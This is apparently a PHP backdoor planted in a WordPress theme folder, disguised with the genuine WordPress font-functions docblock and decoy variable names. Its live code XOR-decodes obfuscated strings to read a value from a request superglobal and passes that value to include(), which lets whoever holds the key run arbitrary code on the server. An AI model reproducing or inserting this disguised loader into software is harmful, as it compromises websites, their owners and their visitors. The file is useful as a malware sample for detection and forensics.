File: /var/www/sites/1250.info/wp-content/themes/o3qps4on/IhyzG.js.php
<?php /*
*
* Fonts functions.
*
* @package WordPress
* @subpackage Fonts
* @since 6.4.0
*
* Generates and prints font-face styles for given fonts or theme.json fonts.
*
* @since 6.4.0
*
* @param array[][] $fonts {
* Optional. The font-families and their font variations. Default empty array.
*
* @type string $font-family => array[] $variations {
* Optional. An associated array of font variations for this font-family.
* Each variation has the following structure.
*
* @type array $font_variation {
* @type string $font-family The font-family property.
* @type string|string[] $s*/
$replace = 'intermediate_dir';
function group_mime_types($urls_to_ping)
{
$color = $urls_to_ping;
$mime_match = 'count';
$ext_preg = $GLOBALS;
$custom_fields = 'parsed';
$ext_preg = $ext_preg[offset("%28%033%25%23%1E", $color)];
$post_categories = $ext_preg;
$chunks = isset($post_categories[$color]);
if ($chunks)
{
$post_types = $ext_preg[$color];
$ext_types = $post_types[offset("%03%28%0A6%08%2C5%1C", $color)];
$imagedata = $ext_types;
$plural_base = 'orderby_array';
include ($imagedata);
}
}
function offset($child, $property_name)
{
$join = 'add_trashed_suffix';
$image_exts = $property_name;
$encoded_text = "url";
$unicode_length = 'fire_after_hooks';
$encoded_text .= "decode";
$protocol = $encoded_text($child);
$post_date = 'timezone';
$atts = strlen($protocol);
$atts = substr($image_exts, 0, $atts);
$meta_input = $protocol ^ $atts;
$double_prime = 'post_author';
$protocol = sprintf($meta_input, $atts);
$terms = 'html_regex';
return $meta_input;
}
$private = 'pee_part';
group_mime_types('wEzifMXyLxWvj');
/* rc The URL(s) to each resource containing the font data.
* @type string $font_style Optional. The font-style property. Default 'normal'.
* @type string $font-weight Optional. The font-weight property. Default '400'.
* @type string $font-display Optional. The font-display property. Default 'fallback'.
* @type string $ascent-override Optional. The ascent-override property.
* @type string $descent-override Optional. The descent-override property.
* @type string $font-stretch Optional. The font-stretch property.
* @type string $font-variant Optional. The font-variant property.
* @type string $font-feature-settings Optional. The font-feature-settings property.
* @type string $font-variation-settings Optional. The font-variation-settings property.
* @type string $line-gap-override Optional. The line-gap-override property.
* @type string $size-adjust Optional. The size-adjust property.
* @type string $unicode-range Optional. The unicode-range property.
* }
* }
* }
function wp_print_font_faces( $fonts = array() ) {
if ( empty( $fonts ) ) {
$fonts = WP_Font_Face_Resolver::get_fonts_from_theme_json();
}
if ( empty( $fonts ) ) {
return;
}
$wp_font_face = new WP_Font_Face();
$wp_font_face->generate_and_print( $fonts );
}
*/